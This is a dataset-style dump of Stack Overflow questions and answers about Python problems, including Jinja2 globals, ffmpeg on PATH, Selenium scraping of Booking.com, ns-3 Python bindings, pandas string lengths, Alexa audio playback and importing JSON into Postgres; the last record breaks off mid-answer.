jinja2.exceptions.UndefinedError: 'float object' has no attribute 'time'
| [
"Looking at the source code of Starlette (i.e., startlette/templating.py)\nYou can see the following line:\nenv.globals[\"url_for\"] = url_for in:\nSo adding the line:\ntemplates.env.globals[\"now\"] = time.time\n\nbefore the return template above fixes it, and adding the below to jobs.html template:\ntime: {{ \"{0:0.2f}\".format(now()-t0) }} sec\ntime: 16.01 sec\n\n"
] | [
1
] | [] | [] | [
"fastapi",
"jinja2",
"python"
] | stackoverflow_0074602664_fastapi_jinja2_python.txt |
Q:
'ffmpeg' is not recognized as an internal or external command,
I have to convert a .TS file to an MP4 file, and for that I am using subprocess.
For this I have written a Python file.
import subprocess
infile = 'vidl.ts'
subprocess.run(['ffmpeg', '-i', infile, 'out.mp4'])
I have also added ffmpeg to the environment variables path.
Also, when I type ffmpeg in cmd it responds normally (screenshot omitted).
When I try to run the Python file it shows me the error:
'ffmpeg' is not recognized as an internal or external command,
operable program or batch file.
Can anyone help me figure out what I am missing?
A:
As @tripleee noted in the comment, you need to look into your system PATH setting. If you'd like to try an easier fix, you can try my ffmpeg-downloader package.
Two lines of commands in command window (then close and reopen the python window) should do the job for you:
pip install ffmpeg-downloader
ffdl install --add-path
The --add-path argument adds its FFmpeg directory to your Per-User PATH.
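Alternatively, if you'd rather not touch PATH at all, you can point subprocess at the binary directly (the path below is a placeholder for wherever your ffmpeg.exe actually lives):
import subprocess

FFMPEG = r"C:\ffmpeg\bin\ffmpeg.exe"  # placeholder: adjust to your actual install location
infile = 'vidl.ts'
subprocess.run([FFMPEG, '-i', infile, 'out.mp4'], check=True)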
| 'ffmpeg' is not recognized as an internal or external command, | I have to convert a .TS file to MP4 File and for that I am using subprocess to convert it.
for this I have written a python file.
import subprocess
infile = 'vidl.ts'
subprocess.run(['ffmpeg', '-i', infile, 'out.mp4'])
I have also added ffmpeg to environment variables path.
also when I type ffmpeg in cmd it shows the following
when I try to run the python file it shows me the error ->
'ffmpeg' is not recognized as an internal or external command,
operable program or batch file.
can Anyone help me out to where I am missing anything.
| [
"As @tripleee noted in the comment, you need to look into your system PATH setting. If you'd like to try an easier fix, you can try my ffmpeg-downloader package.\nTwo lines of commands in command window (then close and reopen the python window) should do the job for you:\npip install ffmpeg-downloader\n\nffdl install --add-path \n\nThe --add-path argument adds its FFmpeg directory to your Per-User PATH.\n"
] | [
0
] | [] | [] | [
"ffmpeg",
"mp4",
"python",
"videoconverter"
] | stackoverflow_0074598999_ffmpeg_mp4_python_videoconverter.txt |
Q:
BeautifulSoup object looks totally different from what I see in Chrome
This is my first attempt at scraping a React-based dynamic website - the Booking.com search result page. I want to collect the current price of specific hotels under the same conditions.
This site used to be easy to scrape with simple CSS selectors, but now they have changed the markup, and every element I want is described with a "data-testid" attribute and a series of seemingly random class names, as far as I can see in the Chrome dev tools. The code I wrote before no longer works and I need to rewrite it.
Yesterday, I learned from another question that in this case what I see in the Chrome developer tools can differ from the HTML contents of the soup object. So I tried printing the whole soup object beforehand to check the actual CSS, then selecting elements using those CSS classes. I also made sure to use Selenium to capture the JS-rendered data.
At first this looked good; however, the returned soup object was totally different from what I see. For instance, the request URL should return a hotel called "cup of tea ensemble" at the top of the list, with the price for 4 adults for 1 night from 2022-12-22 as specified in the URL params, but when looking into the soup object, the hotel does not come first and most of the parameters I added to the URL are ignored.
Does this usually happen when trying to scrape React-based websites? If so, how can I avoid it and collect the data as I see it in the web browser?
I am not sure if this helps, but I am attaching the code I currently use. Thank you for reading and I appreciate any advice!
from bs4 import BeautifulSoup
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
booking_url = 'https://www.booking.com/searchresults.ja.html?lang=ja&ss=Takayama&dest_id=6411914&dest_type=hotel&checkin=2022-12-22&checkout=2022-12-23&group_adults=4&no_rooms=1&group_children=0&sb_travel_purpose=leisure'
#booking_url = 'https://www.google.co.jp/'
options = Options()
options.add_argument('--headless')
driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
driver.get(booking_url)
html = driver.page_source.encode('utf-8')
soup = BeautifulSoup(html, 'html.parser')
print(soup)
A:
The code below produces the exact output that the browser displayed:
import time
from bs4 import BeautifulSoup
import pandas as pd
from selenium.webdriver.chrome.service import Service
from selenium import webdriver
from selenium.webdriver.common.by import By
webdriver_service = Service("./chromedriver") #Your chromedriver path
driver = webdriver.Chrome(service=webdriver_service)
driver.get('https://www.booking.com/searchresults.ja.html?label=gen173nr-1FCAQoggJCDWhvdGVsXzY0MTE5MTRIFVgEaFCIAQGYARW4ARfIAQzYAQHoAQH4AQOIAgGoAgO4AuiOk5wGwAIB0gIkZjkzMzFmMzQtZDk1My00OTNiLThlYmYtOGFhZWM5YTM2OTIx2AIF4AIB&aid=304142&lang=ja&dest_id=6411914&dest_type=hotel&checkin=2022-12-22&checkout=2022-12-23&group_adults=4&no_rooms=1&group_children=0&sb_travel_purpose=leisure&offset=0')
#driver.maximize_window()
time.sleep(5)
soup = BeautifulSoup(driver.page_source,"lxml")
for u in soup.select('div[data-testid="property-card"]'):
title = u.select_one('div[class="fcab3ed991 a23c043802"]').get_text(strip=True)
print(title)
#price = u.select_one('span[class="fcab3ed991 bd73d13072"]').get_text(strip=True)
#print(price)
Output:
cup of tea ensemble
FAV HOTEL TAKAYAMA
ワットホテル&スパ飛騨高山
飛騨高山温泉 高山グリーンホテル
岡田旅館 和楽亭
ザ・町家ホテル高山
旅館あすなろ
IORI STAY
風屋
Tabist 風雪
飛騨高山 本陣平野屋 花兆庵
Thanyaporn Hotel
旅館むら山
cup of tea
つゆくさ
旅館 一の松
龍リゾート&スパ
飛騨高山の宿 本陣平野屋 別館
飛騨牛専門 旅館 清龍
Tomato Takayama Station
民宿 和屋
ビヨンドホテル 高山 セカンド
旅館 岐山
Utatei
ビヨンドホテル高山1s
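One more note: the hashed class names like fcab3ed991 a23c043802 tend to rotate between deployments, so where possible it is safer to select via data-testid attributes. A sketch — the exact testid values are assumptions, so verify them in DevTools:
for card in soup.select('div[data-testid="property-card"]'):
    title = card.select_one('[data-testid="title"]')   # assumed testid -- verify in DevTools
    price = card.select_one('[data-testid="price-and-discounted-price"]')  # assumed testid
    if title:
        print(title.get_text(strip=True),
              price.get_text(strip=True) if price else "n/a")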
| BeautifulSoup object looks totally different from what I see in Chrome | I am in my first attempt in scraping react-based dynamic website - Booking.com search result page. I want to collect the current price of specific hotels under the same conditions.
This site was easy to scrape data with simple CSS selector before, but now they changed how to code and every elements what I want is described with "data-testid" attribute and the series of unknown random numbers, as far as I see in Chrome dev tool. Now the code what I wrote before does not work and I need to rewrite.
Yesterday, I got a wisdom from another question that in this case what I see in Chrome developer tool is different from the HTML contents as of Soup object. So I tried printing the whole soup object beforehand to check the actual CSS, then select elements using these CSS class. I also made sure to use selenium to capture js-illustrated date.
At first this looking good, however, the returned soup object was totally different from what I see. For instance, the request URL should return a hotel called "cup of tea ensemble" on the top of the list with the price for 4 adults for 1 night from 2022-12-22 as its specified in the url params, but when looking into the soup object, the hotel does not come in first and most of the parameters I added in the url are ignored.
Does this usually happen when trying to scrape React-based website? If so, how can I avoid this to collect data as what I see in web browser?
I am not sure if this help but I am attaching the current code what I use. Thank you for reading and I appreciate any advice!
from bs4 import BeautifulSoup
import requests
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
booking_url = 'https://www.booking.com/searchresults.ja.html?lang=ja&ss=Takayama&dest_id=6411914&dest_type=hotel&checkin=2022-12-22&checkout=2022-12-23&group_adults=4&no_rooms=1&group_children=0&sb_travel_purpose=leisure'
#booking_url = 'https://www.google.co.jp/'
options = Options()
options.add_argument('--headless')
driver = webdriver.Chrome(executable_path='./chromedriver', chrome_options=options)
driver.get(booking_url)
html = driver.page_source.encode('utf-8')
soup = BeautifulSoup(html, 'html.parser')
print(soup)
| [
"The below code is producing the exact output what the browser displayed\nimport time\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\nwebdriver_service = Service(\"./chromedriver\") #Your chromedriver path\ndriver = webdriver.Chrome(service=webdriver_service)\n\ndriver.get('https://www.booking.com/searchresults.ja.html?label=gen173nr-1FCAQoggJCDWhvdGVsXzY0MTE5MTRIFVgEaFCIAQGYARW4ARfIAQzYAQHoAQH4AQOIAgGoAgO4AuiOk5wGwAIB0gIkZjkzMzFmMzQtZDk1My00OTNiLThlYmYtOGFhZWM5YTM2OTIx2AIF4AIB&aid=304142&lang=ja&dest_id=6411914&dest_type=hotel&checkin=2022-12-22&checkout=2022-12-23&group_adults=4&no_rooms=1&group_children=0&sb_travel_purpose=leisure&offset=0')\n#driver.maximize_window()\ntime.sleep(5)\n\n\nsoup = BeautifulSoup(driver.page_source,\"lxml\")\nfor u in soup.select('div[data-testid=\"property-card\"]'):\n title = u.select_one('div[class=\"fcab3ed991 a23c043802\"]').get_text(strip=True)\n print(title)\n #price = u.select_one('span[class=\"fcab3ed991 bd73d13072\"]').get_text(strip=True)\n #print(price)\n\nOutput:\ncup of tea ensemble\nFAV HOTEL TAKAYAMA\nワットホテル&スパ飛騨高山\n飛騨高山温泉 高山グリーンホテル\n岡田旅館 和楽亭\nザ・町家ホテル高山\n旅館あすなろ\nIORI STAY\n風屋\nTabist 風雪\n飛騨高山 本陣平野屋 花兆庵\nThanyaporn Hotel\n旅館むら山\ncup of tea\nつゆくさ\n旅館 一の松\n龍リゾート&スパ\n飛騨高山の宿 本陣平野屋 別館\n飛騨牛専門 旅館 清龍\nTomato Takayama Station\n民宿 和屋\nビヨンドホテル 高山 セカンド\n旅館 岐山\nUtatei\nビヨンドホテル高山1s\n\n"
] | [
1
] | [] | [] | [
"beautifulsoup",
"python",
"python_3.x",
"selenium",
"web_scraping"
] | stackoverflow_0074601834_beautifulsoup_python_python_3.x_selenium_web_scraping.txt |
Q:
ns3, Python3 has no module named 'ns'
I am using VirtualBox to build Network Simulator 3 (ns-3); Ubuntu version: Linux Server 20.04 LTS.
The Linux commands that I executed are:
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install gcc g++ python python3 -y
sudo apt-get install python3-setuptools git mercurial -y
sudo apt-get install zip unzip
apt-get install cmake libc6-dev libc6-dev-i386 libclang-6.0-dev llvm-6.0-dev automake -y
sudo apt-get install -y python-gi-cairo
sudo apt-get install -y gir1.2-gtk-3.0
sudo apt-get install -y python-dev
sudo apt-get install -y python3-dev
sudo apt-get install -y qt5-default
sudo apt-get install -y python3-pygraphviz
sudo apt install python3-pip
sudo apt-get install -y graphviz libgraphviz-dev
sudo pip3 install pygraphviz --install-option='--include-path=/usr/include/graphviz' --install-option='--library-path=/usr/lib/graphviz'
Then I used bake to install ns-3, following this page: install ns3 with bake.
Although "bake.py show" tells me that pygraphviz is missing, it is not an essential dependency, so I ignored it and continued building ns-3.
After I successfully built ns-3, I followed the instructions here to execute the "./waf shell" command in the folder "/source/ns-3.29".
Then I ran the command and got the error:
root@ns3simulator:/home/ns3/source/ns-3.29# python3 examples/wireless/mixed-wired-wireless.py
Traceback (most recent call last):
File "examples/wireless/mixed-wired-wireless.py", line 54, in <module>
import ns.applications
ModuleNotFoundError: No module named 'ns'
Could anyone please help me with this? Thanks in advance.
A:
The problem
"import ns.applications"
ModuleNotFoundError: No module named 'ns'
occurs because there is a problem with the ns-3 installation: it was not able to build the Python bindings itself, so you need to configure them manually.
In my case, I have Python 2.7 also installed.
Go to
-> cd [PATH-to-your-ns3.29]
-> /usr/bin/python2.7 ./waf configure
It will enable the Python bindings, as shown in the Waf configuration output (screenshot omitted).
After this, when you can see the Python bindings enabled, you can run your Python script without any error.
Hope it helps!!!
A:
./ns3 configure --enable-python-bindings
Then run the Python example. The libraries should get built.
| ns3, Python3 has no module named 'ns' | I am using a virtual box to build network simulator 3(ns3), Ubuntu version: Linux Server 20.04 LTS
the Linux command that I had executed are
sudo apt-get update
sudo apt-get upgrade
sudo apt-get install gcc g++ python python3 -y
sudo apt-get install python3-setuptools git mercurial -y
sudo apt-get install zip unzip
apt-get install cmake libc6-dev libc6-dev-i386 libclang-6.0-dev llvm-6.0-dev automake -y
sudo apt-get install -y python-gi-cairo
sudo apt-get install -y gir1.2-gtk-3.0
sudo apt-get install -y python-dev
sudo apt-get install -y python3-dev
sudo apt-get install -y qt5-default
sudo apt-get install -y python3-pygraphviz
sudo apt install python3-pip
sudo apt-get install -y graphviz libgraphviz-dev
sudo pip3 install pygraphviz --install-option='--include-path=/usr/include/graphviz' --install-option='--library-path=/usr/lib/graphviz'
Then I use the bake to install the ns3 through following this page: install ns3 with bake
although the "bake.py show" tell me that pygraphvix is Missing, but since it is not an essential dependency, so I ignore it and continue build the ns3
after i successfully built the ns3, I follow the instruction here to execute the "./waf shell" command in the folder "/source/ns-3.29"
then I run the command and get the error:
root@ns3simulator:/home/ns3/source/ns-3.29# python3 examples/wireless/mixed-wired-wireless.py
Traceback (most recent call last):
File "examples/wireless/mixed-wired-wireless.py", line 54, in <module>
import ns.applications
ModuleNotFoundError: No module named 'ns'
Could anyone please help me for this?Thanks in advance.
| [
"The problem\n\"import ns.applications\"\nModuleNotFoundError: No module named 'ns'\nis because there is a problem with the ns-3 installation and it is not able to do python binding itself and you need to manually configure it.\nIn my case, I have python 2.7 also installed\nGo to \n-> cd [PATH-to-your-ns3.29]\n-> /usr/bin/python2.7 ./waf configure\nit will enable the python binding like this\nWaf configuration \nafter this when you can see the python binding enabled you can run your python script without any error.\nHope it helps !!!\n",
"./ns3 configure --enable-python-bindings\n\nThen run the python example. The libraries should get built.\nHere\n"
] | [
0,
0
] | [] | [] | [
"ns_3",
"python",
"python_3.x",
"ubuntu",
"waf"
] | stackoverflow_0061670851_ns_3_python_python_3.x_ubuntu_waf.txt |
Q:
How can I solve the error "AttributeError: 'bool' object has no attribute 'items'" when I print graphs?
I'm trying to make a program able to print wafermaps and histograms for each value selected.
To achieve that, I've made one button to show the graphics of the next parameter selected from the list.
The histogram is shown as I want for every parameter, but it doesn't work for the wafermap graph and it shows this error.
# NEXT PARAMETER
def next_parameter_analyze(self, data_values):
widgets.cmbCurrentParameter.setCurrentText("")
FileName = widgets.txtDataFile.text()
result_file = ResultFile(FileName)
self.measurements = result_file.get_params(list(self.txtParameters.keys()))
self.actual_parameter=(self.actual_parameter+1)%len(self.txtParameters)
par=list(self.txtParameters.keys())[self.actual_parameter]
widgets.cmbCurrentParameter.setCurrentText(par)
self.data_value = self.txtParameters[par].replace(" ", "\t")
estadistica = StatisticsEstepa(self.actual_parameter,self.measurements[par]["measure"],self.config["estepa"])
self.generate_histogram() #GRAPH WORKING
self.generate_wafermap(data_values) #GRAPH NOT WORKING
data_values is necessary to get the values for every parameter; for the histogram graph it is not necessary. It's defined in another function as:
# Get data values from result_file
for fileName in parameters_file_list:
self.textoParametros[fileName]=""
data_values = result_file.get_data_values(fileName) #HERE
for chip in data_values:
self.textoParametros[fileName]+=str(chip)+"\t"+str(data_values[chip])+"\n"
And the get_data_values function is:
def get_data_values(self, name_param):
# get data values chip + measure for printing in QPlainText
get_values = dict()
for die in self.dies:
for module in self.modules:
for param in self.params_list:
if param == name_param:
measure = self.params[die][module][param] # get measure value
if not die in get_values:
get_values[die] = dict()
get_values[die] = measure
return get_values
A:
Not sure where in your code this comes up, but it sounds like you have some variable that is a boolean and you tried to access it like
somebool.items, and Python is telling you that somebool has no attribute items.
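In this particular code, one likely culprit (an assumption, since the signal hookup is not shown): if next_parameter_analyze is connected directly to a QPushButton's clicked signal, Qt passes the button's checked state — a bool — as the first argument, so data_values arrives as False. A sketch of the fix, with btnNext and self.data_values as hypothetical names:
# Likely problematic hookup: clicked emits a 'checked' bool that lands in data_values
# self.btnNext.clicked.connect(self.next_parameter_analyze)

# Sketch: absorb the bool and pass the real data explicitly
self.btnNext.clicked.connect(
    lambda checked=False: self.next_parameter_analyze(self.data_values)
)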
| How can I solve the error "AttributeError: 'bool' object has no attribute 'items'" when I print graphs? | I'm trying to make a program able to print wafermaps and histograms for each value selected.
To achieve that, I've made one button to show the graphics of the next parameter selected from the list.
The histogram is shown as I want for every parameter, but it doesn't work for the wafermap graph and it shows this error.
# NEXT PARAMETER
def next_parameter_analyze(self, data_values):
widgets.cmbCurrentParameter.setCurrentText("")
FileName = widgets.txtDataFile.text()
result_file = ResultFile(FileName)
self.measurements = result_file.get_params(list(self.txtParameters.keys()))
self.actual_parameter=(self.actual_parameter+1)%len(self.txtParameters)
par=list(self.txtParameters.keys())[self.actual_parameter]
widgets.cmbCurrentParameter.setCurrentText(par)
self.data_value = self.txtParameters[par].replace(" ", "\t")
estadistica = StatisticsEstepa(self.actual_parameter,self.measurements[par]["measure"],self.config["estepa"])
self.generate_histogram() #GRAPH WORKING
self.generate_wafermap(data_values) #GRAPH NOT WORKING
data_values is necessary to get the values for every parameter, in the histogram graph is not necessary, and it's defined in another function as:
# Get data values from result_file
for fileName in parameters_file_list:
self.textoParametros[fileName]=""
data_values = result_file.get_data_values(fileName) #HERE
for chip in data_values:
self.textoParametros[fileName]+=str(chip)+"\t"+str(data_values[chip])+"\n"
And the get_data_values function is:
def get_data_values(self, name_param):
# get data values chip + measure for printing in QPlainText
get_values = dict()
for die in self.dies:
for module in self.modules:
for param in self.params_list:
if param == name_param:
measure = self.params[die][module][param] # get measure value
if not die in get_values:
get_values[die] = dict()
get_values[die] = measure
return get_values
| [
"Not sure where in your code this comes up but it sounds like you have some variable that is a boolean and you tried to access it like\nsomebool.items and Python is telling you that somebool has no attribute items\n"
] | [
0
] | [] | [] | [
"boolean",
"graph",
"pyqt",
"pyqt6",
"python"
] | stackoverflow_0074559026_boolean_graph_pyqt_pyqt6_python.txt |
Q:
How would I find the longest string per row in a data frame and print the row number if it exceeds a certain amount
I want to write a program which searches through a data frame and if any of the items in it are above 50 characters long, print the row number and ask if you want to continue through the data frame.
threshold = 50
mask = (df.drop(columns=exclude, errors='ignore')
.apply(lambda s: s.str.len().ge(threshold))
)
out = df.loc[~mask.any(axis=1)]
I tried using this, but I don't want to drop the rows, just print the row numbers where the strings exceed 50
Input:
0 "Robert","20221019161921","London"
1 "Edward","20221019161921","London"
2 "Johnny","20221019161921","London"
3 "Insane string which is way too longggggggggggg","20221019161921","London"
Output:
Row 3 is above the 50-character limit.
I would also like the program to print the specific value or string which is too long.
A:
You can use:
exclude = []
threshold = 30
mask = (df.drop(columns=exclude, errors='ignore')
.apply(lambda s: s.str.len().ge(threshold))
)
s = mask.any(axis=1)
for idx in s[s].index:
print(f'row {idx} is above the {threshold}-character limit.')
s2 = mask.loc[idx]
for string in df.loc[idx, s2.reindex(df.columns, fill_value=False)]:
print(string)
Output:
row 3 is above the 30-character limit.
"Insane string which is way too longggggggggggg","20221019161921","London"
Intermediate s:
0 False
1 False
2 False
3 True
dtype: bool
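An equivalent, more compact way to get the offending (row, column) pairs and values is to stack the masked frame; a sketch assuming the same df and mask as above (stack drops the NaN cells where the mask is False):
```python
offending = df.where(mask).stack()  # Series indexed by (row, column)
for (row, col), string in offending.items():
    print(f'row {row} ({col}) is above the {threshold}-character limit: {string}')
```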
| How would I find the longest string per row in a data frame and print the row number if it exceeds a certain amount | I want to write a program which searches through a data frame and if any of the items in it are above 50 characters long, print the row number and ask if you want to continue through the data frame.
threshold = 50
mask = (df.drop(columns=exclude, errors='ignore')
.apply(lambda s: s.str.len().ge(threshold))
)
out = df.loc[~mask.any(axis=1)]
I tried using this, but I don't want to drop the rows, just print the row numbers where the strings exceed 50
Input:
0 "Robert","20221019161921","London"
1 "Edward","20221019161921","London"
2 "Johnny","20221019161921","London"
3 "Insane string which is way too longggggggggggg","20221019161921","London"
Output:
Row 3 is above the 50-character limit.
I would also like the program to print the specific value or string which is too long.
| [
"You can use:\nexclude = []\nthreshold = 30\n\nmask = (df.drop(columns=exclude, errors='ignore')\n .apply(lambda s: s.str.len().ge(threshold))\n )\n\ns = mask.any(axis=1)\n\nfor idx in s[s].index:\n print(f'row {idx} is above the {threshold}-character limit.')\n s2 = mask.loc[idx]\n for string in df.loc[idx, s2.reindex(df.columns, fill_value=False)]:\n print(string)\n\nOutput:\nrow 3 is above the 30-character limit.\n\"Insane string which is way too longggggggggggg\",\"20221019161921\",\"London\"\n\nIntermediate s:\n0 False\n1 False\n2 False\n3 True\ndtype: bool\n\n"
] | [
0
] | [] | [] | [
"dataframe",
"pandas",
"python"
] | stackoverflow_0074603152_dataframe_pandas_python.txt |
Q:
Make Alexa Skill play audio
I've tried very hard to figure out how to make my Alexa skill to play audio but I cannot find a solution. I emailed the amazon developer support and they sent me the following code. I would love it if someone could explain to me the logic behind this code. Also, how would I make this code into a fully functional Alexa skill? Thank you.
import logging
import typing
from ask_sdk_core.skill_builder import SkillBuilder
from ask_sdk_core.dispatch_components import (
AbstractRequestHandler, AbstractRequestInterceptor, AbstractExceptionHandler)
import ask_sdk_core.utils as ask_utils
from ask_sdk_core.utils import is_intent_name, is_request_type
from ask_sdk_core.api_client import DefaultApiClient
from ask_sdk_core.skill_builder import SkillBuilder, CustomSkillBuilder
from ask_sdk_core.dispatch_components import AbstractRequestInterceptor
from ask_sdk_core.dispatch_components import AbstractResponseInterceptor
from ask_sdk_model.services.service_exception import ServiceException
if typing.TYPE_CHECKING:
from ask_sdk_core.handler_input import HandlerInput
from ask_sdk_model import Response
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
WELCOME_MESSAGE = "This is Alexa regular speech, followed by the sound effect named Bear Groan Roar <audio src='soundbank://soundlibrary/animals/amzn_sfx_bear_groan_roar_01'/>"
WHAT_DO_YOU_WANT = "What do you want to ask?"
class LaunchRequestHandler(AbstractRequestHandler):
"""Handler for Skill Launch."""
def can_handle(self, handler_input):
# type: (HandlerInput) -> bool
return is_request_type("LaunchRequest")(handler_input)
def handle(self, handler_input):
# type: (HandlerInput) -> Response
return handler_input.response_builder.speak(WELCOME_MESSAGE).ask(WHAT_DO_YOU_WANT).response
sb = CustomSkillBuilder(api_client=DefaultApiClient())
sb.add_request_handler(LaunchRequestHandler())
A:
I understand you are trying to play a streaming music station. If this is the case, it is implemented using the AudioPlayer interface; please find more information at the link below:
https://developer.amazon.com/en-US/docs/alexa/custom-skills/audioplayer-interface-reference.html
There is an AudioPlayer sample skill that already streams from a radio station, which you can refer to. It can be found here: https://github.com/alexa-samples/skill-sample-nodejs-audio-player , and in Python at https://github.com/alexa-samples/skill-sample-python-audio-player . You will need to swap in your own stream URL.
Please take into account that the URL you provide in the audioItem.stream.url property must meet these requirements:
https://developer.amazon.com/en-US/docs/alexa/custom-skills/audioplayer-interface-reference.html#audio-stream-requirements
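To sketch what this looks like in the ASK SDK for Python: an intent handler can return a PlayDirective pointing at your stream. The intent name, token, and URL below are placeholders (the stream must be HTTPS and meet the requirements linked above):
```python
from ask_sdk_core.dispatch_components import AbstractRequestHandler
from ask_sdk_core.utils import is_intent_name
from ask_sdk_model.interfaces.audioplayer import (
    PlayDirective, PlayBehavior, AudioItem, Stream)

class PlayStreamIntentHandler(AbstractRequestHandler):
    def can_handle(self, handler_input):
        return is_intent_name("PlayStreamIntent")(handler_input)

    def handle(self, handler_input):
        stream_url = "https://example.com/my-stream.mp3"  # placeholder URL
        directive = PlayDirective(
            play_behavior=PlayBehavior.REPLACE_ALL,
            audio_item=AudioItem(
                stream=Stream(
                    token="my-stream-token",       # any identifier you choose
                    url=stream_url,
                    offset_in_milliseconds=0)))
        # AudioPlayer responses should end the session; playback continues on its own
        return (handler_input.response_builder
                .add_directive(directive)
                .set_should_end_session(True)
                .response)
```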
| Make Alexa Skill play audio | I've tried very hard to figure out how to make my Alexa skill to play audio but I cannot find a solution. I emailed the amazon developer support and they sent me the following code. I would love it if someone could explain to me the logic behind this code. Also, how would I make this code into a fully functional Alexa skill? Thank you.
import logging
import typing
from ask_sdk_core.skill_builder import SkillBuilder
from ask_sdk_core.dispatch_components import (
AbstractRequestHandler, AbstractRequestInterceptor, AbstractExceptionHandler)
import ask_sdk_core.utils as ask_utils
from ask_sdk_core.utils import is_intent_name, is_request_type
from ask_sdk_core.api_client import DefaultApiClient
from ask_sdk_core.skill_builder import SkillBuilder, CustomSkillBuilder
from ask_sdk_core.dispatch_components import AbstractRequestInterceptor
from ask_sdk_core.dispatch_components import AbstractResponseInterceptor
from ask_sdk_model.services.service_exception import ServiceException
if typing.TYPE_CHECKING:
from ask_sdk_core.handler_input import HandlerInput
from ask_sdk_model import Response
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
WELCOME_MESSAGE = "This is Alexa regular speech, followed by the sound effect named Bear Groan Roar <audio src='soundbank://soundlibrary/animals/amzn_sfx_bear_groan_roar_01'/>"
WHAT_DO_YOU_WANT = "What do you want to ask?"
class LaunchRequestHandler(AbstractRequestHandler):
"""Handler for Skill Launch."""
def can_handle(self, handler_input):
# type: (HandlerInput) -> bool
return is_request_type("LaunchRequest")(handler_input)
def handle(self, handler_input):
# type: (HandlerInput) -> Response
return handler_input.response_builder.speak(WELCOME_MESSAGE).ask(WHAT_DO_YOU_WANT).response
sb = CustomSkillBuilder(api_client=DefaultApiClient())
sb.add_request_handler(LaunchRequestHandler())
| [
"I understand you are trying to play a streaming music station, if this is the case, this will be implemented using AudioPlayer interface, please find more information on the link below:\nhttps://developer.amazon.com/en-US/docs/alexa/custom-skills/audioplayer-interface-reference.html\nThere is an AudioPlayer sample skill which actually streams from a radio station already to which you can refer. That can be found here: https://github.com/alexa-samples/skill-sample-nodejs-audio-player , also in python https://github.com/alexa-samples/skill-sample-python-audio-player . You will need to change the url stream and add your own.\nPlease take into account that the URL you provide in the audioItem.stream.url property must meet these requirements:\nhttps://developer.amazon.com/en-US/docs/alexa/custom-skills/audioplayer-interface-reference.html#audio-stream-requirements\n"
] | [
0
] | [] | [] | [
"alexa_app",
"alexa_skill",
"python",
"python_3.x"
] | stackoverflow_0061902502_alexa_app_alexa_skill_python_python_3.x.txt |
Q:
I need to copy data from json file to Postgress
I need to copy data from json file to Postgresql database. I have a json file that have 9000 users with information about them, that looks like this:
"name": "Kathryn", "time_created": 1665335716, "gender": "female", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}
I need to copy data from this file to Postgresql. How can I do this by sql or python. Postgresql database is in local docker compose container
A:
@George Rybojchuk, check the complete SQL below:
drop table if exists sample_json;
drop table if exists target;
create table sample_json(record json not null);
create table target(name varchar(20),time_created varchar(20));
insert into sample_json(record) values('{"name": "Kathryn", "time_created": 1665335716, "gender": "female", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}');
select * from sample_json;
insert into target(name,time_created)
select record->'name',record->'time_created'
from sample_json;
python approach:
import json
if __name__ == '__main__':
records = [
'{"name": "Kathryn", "time_created": 1665335716, "gender": "female", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}',
'{"name": "Kathryn1", "time_created": 1665335716, "gender": "female", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}',
'{"name": "Kathryn2", "time_created": 1665335716, "gender": "male", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}',
]
for record in records:
json_data = json.loads(record)
name = json_data['name']
gender = json_data['gender']
print(name, gender)
# connect postgresql
# insert into target table
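To actually load the whole 9000-user file, here is a minimal sketch using psycopg2. It assumes the file is a JSON array named users.json and that a users table with matching columns already exists; adjust the file name, table, columns, and the docker-compose connection settings to your setup:
```python
import json
import psycopg2
from psycopg2.extras import execute_values

with open("users.json") as f:
    users = json.load(f)  # assumes the file holds a JSON array of user objects

conn = psycopg2.connect(host="localhost", port=5432,
                        dbname="mydb", user="postgres", password="postgres")
with conn, conn.cursor() as cur:
    execute_values(
        cur,
        "INSERT INTO users (user_id, name, last_name, balance) VALUES %s",
        [(u["user_id"], u["name"], u["last_name"], u["balance"]) for u in users])
conn.close()
```
execute_values batches the inserts, which is much faster than one INSERT per user.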
| I need to copy data from json file to Postgress | I need to copy data from json file to Postgresql database. I have a json file that have 9000 users with information about them, that looks like this:
"name": "Kathryn", "time_created": 1665335716, "gender": "female", "age": 38, "last_name": "Smith", "ip": "192.168.0.110", "city": "NY", "premium": null, "birth_day": "01.01", "balance": 55.43255500944704, "user_id": 8676}
I need to copy data from this file to Postgresql. How can I do this by sql or python. Postgresql database is in local docker compose container
| [
"@George Rybojchuk\ncheck complete sql :\ndrop table if exists sample_json;\ndrop table if exists target;\ncreate table sample_json(record json not null);\ncreate table target(name varchar(20),time_created varchar(20));\ninsert into sample_json(record) values('{\"name\": \"Kathryn\", \"time_created\": 1665335716, \"gender\": \"female\", \"age\": 38, \"last_name\": \"Smith\", \"ip\": \"192.168.0.110\", \"city\": \"NY\", \"premium\": null, \"birth_day\": \"01.01\", \"balance\": 55.43255500944704, \"user_id\": 8676}');\nselect * from sample_json;\ninsert into target(name,time_created)\nselect record->'name',record->'time_created'\nfrom sample_json;\n\npython approach:\nimport json\n\nif __name__ == '__main__':\n\n records = [\n '{\"name\": \"Kathryn\", \"time_created\": 1665335716, \"gender\": \"female\", \"age\": 38, \"last_name\": \"Smith\", \"ip\": \"192.168.0.110\", \"city\": \"NY\", \"premium\": null, \"birth_day\": \"01.01\", \"balance\": 55.43255500944704, \"user_id\": 8676}',\n '{\"name\": \"Kathryn1\", \"time_created\": 1665335716, \"gender\": \"female\", \"age\": 38, \"last_name\": \"Smith\", \"ip\": \"192.168.0.110\", \"city\": 